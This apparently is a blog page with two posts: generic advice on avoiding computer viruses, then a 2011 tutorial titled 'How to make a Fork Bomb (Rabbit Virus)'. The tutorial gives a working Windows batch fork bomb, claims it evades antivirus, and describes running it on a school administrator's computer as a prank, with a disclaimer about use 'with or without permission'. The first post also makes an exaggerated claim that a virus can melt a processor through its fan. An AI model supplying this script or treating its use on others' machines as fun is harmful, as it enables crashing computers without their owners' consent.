Showing posts with label Fork Bomb Virus. Show all posts
Showing posts with label Fork Bomb Virus. Show all posts

Thursday, 17 October 2013

How To Avoid Computer Viruses?

Computer viruses are as old as the personal computer. So, in order to prevent computer viruses, every PC user needs to acquire determined computer skills. For example, how to install programs, make software upgrades, configure a firewall or how to setup an anti-spyware program.
All of these skills will help you avoid computer viruses. However, if we want to fight our enemy effectively, we need to know what it is.
What Is A Computer Virus?
A computer virus is a software program that has been created by a human. The intention of the virus is to cause chaos and destruction to the computer. Although most of the cases it is limited to the software, there have been some instances in which a virus had damaged a piece of hardware.

Fortunately, hardware damage is very scarce. The only way in which a virus could damage a piece of equipment is by exploiting a glitch in the programming. For example, it could slow down the speed of the processor's fan. That way the processor overheats and melts down.
How To Prevent Computer Viruses
How can we prevent computer viruses is the big question that millions of users make everyday. The first rule in this eternal battle for computer security is to have an up-to-date antivirus. Notice the word up-to-date. That means that your antivirus software needs to be updated every day. Viruses are always appearing, so do not sub estimate them. In less than 24 hours your antivirus could be obsolete.

The next important rule is still related to actualizations. Although you may have your antivirus updated, that doesn't mean that there are other weaknesses in your system. As a matter of fact, there isn't an unbreachable computer. Even the most expensive system can be cracked by an expert.

So, it doesn't matter if you have a guardian dog tied at the front entrance of your house if your windows are open. That's why the rest of your software needs to be updated. The first piece of software that needs to be actualized is the operating system.

Almost eighty percent of the world uses Microsoft software. Hence, it is the favorite victim of black hat hackers. Configure your Windows configuration so it can make automatic actualizations that can prevent computer viruses.

The same thing goes for productivity software like Microsoft Office or even entertainment software like computer games. All software is under constant changes once it is delivered into the market. Consider the millions of possible configurations that a computer program needs to affront once it is introduced.

Monday, 5 December 2011

How to make a Fork Bomb (Rabbit Virus)


3591860560 4b3f72fba4 300x295 How to make a Fork Bomb (Rabbit Virus)
Introduction
Hey guys, I ‘ve got a new thing for all u guys to have fun with, its very easy and fun to do. Before we start coding ill explain what a fork bomb actually is.
A fork bomb or rabbit virus opens an application for example cmd.exe so many times that its overloads the computers processor which results in the computer either overheating, shutting down or in some cases you can get a BSOD (blue screen of death). Unlike little batch viruses like the shutdown one you cannot stop a fork bomb unless you extremely 1337 so once it starts it goes until it does its job.
Most Anti-Virus software will not pick a fork bomb or rabbit virus, as far as its concerned its just a batch file the opens and application.
Background
Fork Bombs aka Rabbit viruses have been around for ages due to their effectiveness to evade anti-virus software. I came across it when i wanted to play a practical joke on my schools administrator for his birthday. Just to let you know it worked and hes not some n00b. I find them very effective just don’t bomb yourself.
The code
Ok this is the code that you type into notepad.exe remember to save it as a .bat or if you want it in a dorminant for save it as a .txt
One more thing…I am not responsible if you kills your computer or somebody else computer with or without permission. Now that we have that out a the way here we go…
Blocks of code should be set as style “Formatted” like this.
:s
START %0
GOTO :s
Have fun guys and do leave your feedback about this article!